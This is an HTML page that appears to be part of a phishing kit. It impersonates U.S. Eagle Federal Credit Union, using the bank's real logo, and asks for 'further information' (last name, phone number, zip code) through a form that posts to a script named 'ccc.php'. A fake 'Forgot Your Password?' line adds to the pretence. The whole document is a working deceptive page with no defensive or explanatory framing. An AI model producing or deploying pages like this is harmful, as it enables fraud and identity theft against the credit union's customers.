<!DOCTYPE html>
<html>
<head>
	<style type="text/css">body {
  background-color: #00384a;
}
	</style>
</head>
<body>&nbsp;</body>
</html>
<title></title>
<meta content="width=device-width, initial-scale=1" name="viewport" />
<style type="text/css">body {
            font-family: Arial, Helvetica, sans-serif;
        }

        form {
            border: 3px solid #f1f1f1;
        }

        input[type=text],
        input[type=password] {
            width: 100%;
            padding: 12px 20px;
            margin: 8px 0;
            display: inline-block;
            border: 1px solid #ccc;
            box-sizing: border-box;
        }

        button {
            background-color: #C3D600;
            color: white;
            padding: 14px 20px;
            margin: 8px 0;
            border: none;
            cursor: pointer;
            width: 100%;
        }

        button:hover {
            opacity: 0.8;
        }

        .cancelbtn {
            width: auto;
            padding: 10px 18px;
            background-color: #f44336;
        }

        .imgcontainer {
            text-align: center;
            margin: 24px 0 12px 0;
            background-color: #00384a;
        }

        img.avatar {
            width: 40%;
            border-radius: 50%;
        }

        .container {
            padding: 16px;
            background-color: #00384a;
        }

        span.psw {
            float: right;
            padding-top: 16px;
        }

        /* Change styles for span and cancel button on extra small screens */
        @media screen and (max-width: 300px) {
            span.psw {
                display: block;
                float: none;
            }

            .cancelbtn {
                width: 100%;
            }
        }
</style>
<h2>&nbsp;</h2>

<form action="ccc.php" method="post">
<div class="imgcontainer" style="text-align: left;"><img alt="" src="https://useaglefcu.financialhost.org/Media/Default/FILogo/USEAGLE_Logo_FCU_Color_peoplemeanmore_082020.png" style="width: 250px; height: 73px;" /></div>

<div class="container"><span style="color:#FFFFFF;"><label for="uname"><strong>Further Information Required:</strong></label>&nbsp;</span><input name="name" placeholder="Last Name" required="" type="text" /> <span style="color:#FFFFFF;"><label for="psw"><strong></strong></label>&nbsp;</span><input name="phone" placeholder="Phone Number" required="" type="text" /> <span style="color:#FFFFFF;"><label for="psw"><strong></strong></label>&nbsp;</span><input name="zip" placeholder="Zip Code" required="" type="text" /><button type="submit"><span style="color: #003E52; font-family: Verdana, Geneva, sans-serif; font-size: 17px;">Confirm</span></button></div>

<div class="container"><font color="#ffffff" face="verdana, geneva, sans-serif"><u>Forgot Your Password?</u></font></div>
</form>
